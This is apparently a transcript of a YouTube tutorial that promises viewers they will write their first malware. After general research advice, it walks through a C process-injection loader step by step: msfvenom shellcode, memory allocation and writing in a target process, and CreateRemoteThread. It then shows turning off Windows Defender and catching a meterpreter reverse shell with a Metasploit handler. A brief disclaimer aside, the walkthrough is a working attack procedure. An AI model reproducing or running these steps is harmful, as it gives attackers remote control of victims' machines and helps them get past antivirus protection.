By the end of this video, you will write your first malware and will have enough knowledge to go and explore malware development on your own. Okay, let's start with what you need to know, because when I wanted to write my first malware, I was like, what do I need? Is knowing C enough? Because, yeah, you kinda need to know C. And, well, yes. This is enough. You will learn all the other stuff along the way. If you ask me, doing projects is the best way to learn, and not because you actually get to build stuff and not just read about it, it's because you will find a ton of bugs along the way that you will learn to fix, and in general you will stumble upon a lot of knowledge that is not necessarily related to malware development, but will be very useful in your cybersecurity journey. But keep in mind that this video is for educational purposes only. So if you intend to do any harm with software you will write, or even prank your friend, don't do that. Turn off the video, it's not for you. But you still need resources to learn from, so I'm gonna give you all that right now. First you wanna visit google.com. And no, this is not a joke, let me show you. For starters, you wanna ask a question like, what types of malware are there? This time I'm gonna answer this question for you. Well, at least partially, because as you can see, to cover all of these types, this video would have to be like an hour long. Starting with ransomware, which is probably the most destructive malware out there, it usually extorts and encrypts data inside a company network. Ransomware operator, the person behind the malware, is then asking for money in exchange for the decryption key. If victim doesn't agree to pay, operator will most likely publish all the sensitive information they gathered. Then we have info stealers, and the name is pretty self-explanatory. They are used to steal information, credentials for example. They are also a plague and are very likely to come in bundle with other malware. Last one I'm gonna mention is botnet, which by itself is a network of zombie computers. A special malware is traveling through hundreds of thousands or even millions machines, infecting them. It talks with a command and control server and does whatever it is told to do. Now pick one that seems cool to you. I think I've started with a simple ransomware or a stealer, but for both of them actually I have videos on my YouTube channel, so check them out, link in the description. Let's say you wanna go with ransomware. Research again. What is ransomware? How ransomware works? What is encryption? What types of encryption out there? What types of encryption are used by ransomware? What are the biggest ransomware groups? How to reverse engineer a ransomware, or maybe watch reverse engineering videos of some popular ransomware so you know how they look inside, how they are built. Okay, so I've done like maybe 2 minutes of Google searches and I already came across all these articles and YouTube videos. This one, for example, teaches you about common encryption algorithms. And this one shows you how to use hybrid encryption scheme, which is a combination of AES and RSA. This is what I'm talking in my ransomware video. Again, check it out, link in the description. And this guy even provides code snippets for you. So this is super detailed. You have external links, so like, I know, 7 maybe or something, so I didn't count it. More articles you can read. Reverse engineering WannaCry. WannaCry is one of the most maybe popular, if I think I can say this, ransomwares. I also done a video about reverse engineering WannaCry, but this is an article that describes it. So you can see how the ransomware looks inside, sort of. More reverse engineering articles and more reverse engineering articles. How ransomware works. You have article here describing some statistics, examples of different ransomware groups. You can research them. You have all these YouTube videos about reverse engineering ransomware and from a lot of great content creators. So knowledge is there. The key is to learn how to do a proper research. That's what I want you primarily to get from this video. Now I want to show you this website called VX Underground. This is the biggest collection of malware samples on the internet. But not only malware samples, they also have this folder called papers. If you click there, you can see articles about malware development, malware analysis, and pretty much everything related to malware. Let's go to Windows catalog, and here you can see all the categories. For example, persistence. Open persistence catalog and you see all of these articles 36 files about how to make malware persistent and different techniques involving persistence. So you have plenty of knowledge here, from the most beginner-friendly stuff to the super advanced stuff that I'm not even touching, because it's far out of reach for me right now. In the future, maybe, we'll see. You also need to have some knowledge about how Windows works, or whatever OS you are targeting. Again, plenty of resources online, just Google something like Windows internals. Although there is this one book that I can recommend, it is called Windows Internals Part 1. It is very detailed and describes pretty much everything you will ever need in terms of how Windows is built. And I almost forgot to mention that I have a fresh series on my channel about Windows internals, so definitely go check it out, link in the description. Okay, so once you know what you wanna build, next thing is to learn how to do it. For Windows malwares, the most essential library is windows.h. It gives you access to Windows API functions, which allows you to communicate with Windows operating system. There is this amazing website called MSDN, or Microsoft Documentation. Almost every function in Windows API is present there and well documented, so that it is easy to use them. But in the beginning of this video I promised that you will build your first malware today, and I'm going to keep this promise, so open up Visual Studio and let's write some code. Our malware will use a technique called process injection to execute a malicious payload inside another process. So to do that we need a malicious payload first. We'll generate it with msfvenom command inside Kali Linux. Copy this from the description of the video, hit enter, wait a couple seconds, and you will be greeted with this shellcode. So copy it, go to Visual Studio and paste it into the main function. Let's name it to maybe payload, like this. Alright, now what we're gonna do next, using the functions from windows.h library, as I talked earlier. Okay, maybe not. Maybe first let's create a variable called PID that will hold the process ID. If you don't know how processes work, I have a video about them on my channel, so go check it out before going further. We want to get a process ID to the a target process, basically, an ID of the target process. So we will be able to specify just for our debugging purposes which process we want to target. Now we want to get a handle to this process. We will use an open process function. We want to have all access to this process, so we specify process all access as the first parameter, second parameter false, and last parameter is PID, which is our process ID. Okay, so let's add a simple if statement. If h process is equal to null, we want to print an error. Let's say error open process, something like this. Return 1. Alright, so next thing is LP void buffer. We want to allocate some memory inside this process so that we can later copy this shellcode to this memory. So we're gonna use virtual allocate ex function for this. First parameter is gonna be handle to our process, then we specify null. We pass null here, then we pass size of our payload +1, then we specify allocation type. You want to specify here mem reserve and mem commit. Mem reserve and mem commit, and page execute read write. And now, what does it even mean? Mem reserve means that we are reserving a range of virtual addresses inside the memory of this process. And mem commit means that we are assigning these virtual addresses to a physical addresses. Okay, this whole mapping thing is going on when we type mem commit here. We are committing this this memory, this virtual region that we reserved before. Basically, you need to know the concept of virtual memory for this. I don't want to get into that in this video. There are plenty tutorials on YouTube for this. Just type virtual memory and you will have a bunch of people explaining how this works. Maybe I will make a video about it someday. I don't know. I have a video about processes and process internals right now. You are also welcome to check it out. But yeah, that's how it basically, in a very short explanation of how does this work. And page execute read write is here because we want to be able to execute a code that is inside this memory. So again, a simple if statement: if buffer is equal to null, let's printf what? Error virtual alloc ex, like this, and return 1. Alright, so once we have this, once we have allocated some memory, we want to then write to this memory with write process memory function. It takes hprocess as first parameter, then it takes our buffer that we just allocated, then it takes payload, which is what we want to write inside this buffer, then size of the payload, size of this payload, and what? And null as the last parameter. By the way, if you have any problems with these parameters, you are not sure if you understand them, let's say you don't understand the write process memory function, right? What do? You open a new tab, you type Microsoft documentation, let's say this, write process memory, search for it, here it is, well documented, every parameter described with values that can be specified even with some examples. So yeah, basically everything is there, you just need to Google it, and that's, once again, that's the main point of this video, basically, to show you that that you just need to do research. That's the, without research, without ability to search for information, you won't learn anything. Write process memory, like this. Okay, so return 1. So this again, we wrap this write process memory function into this if statement so that we know if this was successful or not. Of course, a real malware wouldn't have this, but it's just a good thing to do once while you are developing your code, your program, while you are writing code. Basically, it's easier to debug possible problems. Now, handle hthread. We are going to now create a function that we actually write this code. Create remote thread, hprocess, null 0, lp thread start routine, lp thread start routine buffer, and last parameter is null. Okay, wait, not last, but yeah, null here, 0 here, null here. Once again, this is your first malware, so you probably have no idea what this means. So what do? I'm gonna keep repeating this. You open a new tab, you paste this function, you see the first link that comes up. This is the Microsoft documentation once again, and you have all of this described. Of course, you are welcome to ask me questions in the comments or add me on Discord, and there we can talk. I will help you with any problems you have with this code, but basically this should answer all your questions. And if you are not sure, then ask me. Again, next thing would be to write an if statement again. if this hthread function, if this hthread handle is null, then you want to printf this error message that something went wrong. Error create remote thread. Okay, and return 1. Printf. I misspelled it. And the last is wait for single object. We don't want our code to just finish working. We want it to stay. We want it to stay present. We don't want it to finish its own process, because we need it running basically because this is a reversal. I think I forgot to mention it in the beginning. This is going to give us a remote access to the machine that you run this code on. Of course, it will not bypass any antivirus, so don't expect it to work out of the box. You will need to disable Windows Defender, which I'm gonna do right now. Let me quickly do that. You go here, you go to Manage Settings and Real-Time Protection off. Okay, you saw a black screen for a second, but that's all right. Now let's go back to Kali Linux, because we are finally ready to test it. To do that, you want to open MSF console this time. MSF console. Wait a second for it to load. Now type. Wait, can I zoom it in a little bit? I can. Use multi-handler options. You have all these options, and you actually should have more. Let me copy this payload that we used, because you need to specify the payload first. You're gonna do it like this: set payload to this. Wait, my terminal broke, but that's okay. Options one more time. What do we need? We need LHOST. So set LHOST 192.168.0.130. This is the IP of Kali Linux. So yeah, type just here. Type this IP. If you don't know what is IP of your machine, of your Kali Linux machine, just type what? ifconfig, right? Am I right? Yes, ifconfig, and one of these interfaces will be correct, depending on your network configuration, of course, but I'm sure you will figure it out. What else do we need to set up? EXITFUNC. Set EXITFUNC to thread, like this, and we should be good to go. So now run, and it will listen for incoming connections. Go back to Visual Studio. We should be able to run it with no errors. Yes, it built it successfully. Okay, it asks us for PID. So let me open up a notepad and a process hacker to determine the PID of notepad. Of course, you can do it with Task Manager, but I just... Oh, very nice PID actually, 404. Very nice. So, 404. And press enter. And as you can see, it is hanging. It is not closing our application. It is actually right here on wait for single object. And if you go back to Kali Linux, you have this meterpreter session. You can type shell. Who am I? Utopia am young. This is my PC name and username. So, congratulations, you did it. You wrote your first malware. I hope you were following along. And if you didn't, then this code is in my GitHub, link in the description. And yeah, congrats. From this, you can only go forward with your journey. Thanks for sticking till the end. If you have any questions, write them down in the comments. And if you enjoyed the video, leave a like, subscribe, and see you soon.